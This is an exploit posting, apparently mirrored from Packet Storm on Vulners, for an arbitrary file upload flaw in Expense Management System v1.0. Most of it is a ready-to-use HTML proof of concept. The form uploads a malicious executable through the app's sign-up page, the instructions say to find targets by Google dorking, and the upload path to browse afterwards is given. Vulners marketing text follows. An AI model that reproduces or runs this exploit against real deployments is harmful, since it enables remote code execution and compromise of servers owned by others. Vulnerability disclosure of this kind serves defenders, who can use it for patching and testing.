Lucene search
K

Expense Management System 1.0 Arbitrary File Upload

🗓️ 17 Sep 2024 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 202 Views

Expense Management System v1.0 Arbitrary File Upload vulnerability in Sign Up For

Code
`=============================================================================================================================================  
| # Title : Expense Management System v1.0 Remote File Upload Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |  
| # Vendor : https://www.kashipara.com/project/download/project2/user/2024/202406/kashipara.com_expensemanagement-zip.zip |  
=============================================================================================================================================  
  
POC :  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] The following html code uploads a executable malicious file remotely .  
  
[+] Go to the line 11.  
  
[+] Set the target site link Save changes and apply .   
  
[+] save code as poc.html .  
  
<!DOCTYPE html>  
<html lang="en">  
<head>  
<meta charset="UTF-8">  
<meta name="viewport" content="width=device-width, initial-scale=1.0">  
<title>Sign Up Form</title>  
</head>  
<body>  
  
<!-- Sign Up Form -->  
<form action="http://127.0.0.1/ExpenseManagement/templates/2-sign-up.php" method="POST" enctype="multipart/form-data">  
  
<!-- File input -->  
<label for="inpFile">Upload File:</label>  
<input type="file" id="inpFile" name="inpFile">  
<br>  
  
<!-- Full name input -->  
<label for="full_name">Full Name:</label>  
<input type="text" id="full_name" name="full_name">  
<br>  
  
<!-- Email input -->  
<label for="email">Email:</label>  
<input type="email" id="email" name="email">  
<br>  
  
<!-- Username input -->  
<label for="username">Username:</label>  
<input type="text" id="username" name="username">  
<br>  
  
<!-- Password input -->  
<label for="password">Password:</label>  
<input type="password" id="password" name="password">  
<br>  
  
<!-- Confirm password input -->  
<label for="password_confirm">Confirm Password:</label>  
<input type="password" id="password_confirm" name="password_confirm">  
<br>  
  
<!-- Submit button -->  
<input type="submit" name="register" value="Register">  
  
</form>  
  
</body>  
</html>  
  
[+] http://127.0.0.1/ExpenseManagement/static/profileImages/  
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Sep 2024 00:00Current
7.4High risk
Vulners AI Score7.4
202